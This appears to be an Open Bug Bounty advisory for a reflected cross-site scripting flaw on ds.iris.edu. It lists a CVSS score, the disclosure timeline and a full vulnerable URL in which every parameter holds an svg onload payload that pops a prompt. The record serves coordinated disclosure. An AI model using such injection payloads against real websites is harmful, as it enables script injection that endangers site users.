ds.iris.edu XSS vulnerability

2017-12-03T03:36:00
ID OBB:447164
Type openbugbounty
Reporter ut
Modified 2018-03-03T03:36:00

Description

Open Bug Bounty ID: OBB-447164

Description| Value
---|---
Affected Website:| ds.iris.edu
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://ds.iris.edu/ieb/index.html?format=text%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&nodata;=404%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&starttime;=1970-01-01%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&endtime;=2025-01-01%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&minmag;=0%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&maxmag;=10%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&mindepth;=0%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&maxdepth;=900%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&orderby;=time-desc%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&limit;=200%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&maxlat;=52.150%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&minlat;=50.150%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&maxlon;=-179.410%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&minlon;=178.590%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&sbl;=1%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&pbl;=1%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&audience;=epo%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&caller;=spanevlnk%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&evid;=5173864%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&name;=ISLAS%20RATA,%20ALEUTIANAS%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&zm;=7%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E&mt;=ter%22%3E%3Csvg/onload=prompt(/OPENBUGBOUNTY/)%3E

Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 3 December, 2017 03:36 GMT
Vulnerability Verified:| 3 December, 2017 03:38 GMT
Website Operator Notified:| 3 December, 2017 03:38 GMT
Vulnerability Published:| 3 December, 2017 03:38 GMT [without any technical details]
Public Disclosure:| 3 March, 2018 03:36 GMT